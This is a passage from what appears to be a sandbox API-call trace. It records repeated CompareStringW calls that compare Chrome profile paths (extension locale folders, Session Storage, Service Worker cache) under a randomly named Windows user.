Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount2=139) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount2=139) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount2=139) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount2=139) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount2=139) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount2=130) returned 3 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount2=130) returned 1 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount2=130) returned 3 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount2=130) returned 3 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount2=130) returned 1 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount2=130) returned 3 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount2=130) returned 1 [0286.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount2=130) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount2=130) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount2=130) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount2=130) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount2=130) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount2=130) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount2=130) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\", cchCount2=139) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount2=133) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount2=133) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\no\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount2=133) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount2=133) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_HK\\", cchCount2=133) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\", cchCount2=84) returned 1 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 3 [0286.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0286.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 